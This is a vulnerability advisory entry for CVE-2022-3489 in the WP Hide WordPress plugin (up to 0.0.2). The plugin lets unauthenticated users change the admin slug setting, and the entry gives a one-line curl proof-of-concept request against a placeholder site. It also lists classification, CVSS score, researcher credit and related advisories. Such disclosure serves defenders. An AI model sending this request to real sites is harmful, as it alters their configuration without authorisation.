WP Hide <= 0.0.2 – Unauthenticated Settings Update | CVE 2022-3489

Description

The plugin does not have authorisation and CSRF checks in place when updating the custom_wpadmin_slug settings, allowing unauthenticated attackers to update it with a crafted request

Proof of Concept

curl -X POST --data "custom_wpadmin_slug=attacker-value" https://example.com/wp-admin/admin-post.php

Settings is displayed in Settings > Permalinks

Affects Plugins

wp-hide

No known fix

References

CVE

CVE-2022-3489

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CWE-862

CVSS

5.3 (medium)

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

36d78b6c-0da5-44f8-b7b3-eae78edac505

Timeline

Publicly Published

2022-10-17 (about 3 years ago)

Added

2022-10-17 (about 3 years ago)

Last Updated

2022-10-17 (about 3 years ago)

Other

Published

Title

Published

2025-11-20

Title

Checkbox < 2.8.11 - Missing Authorization to Unauthenticated Log Clearing

Published

2025-04-01

Title

Export All Post Meta <= 1.2.1 - Missing Authorization

Published

2024-07-19

Title

Arconix Shortcodes < 2.1.12 - Missing Authorization

Published

2025-03-31

Title

Chat by Chatwee <= 2.1.3 - Missing Authorization

Published

2026-01-06

Title

User Activity Log <= 2.2 - Unauthenticated Limited Options Update via Failed Login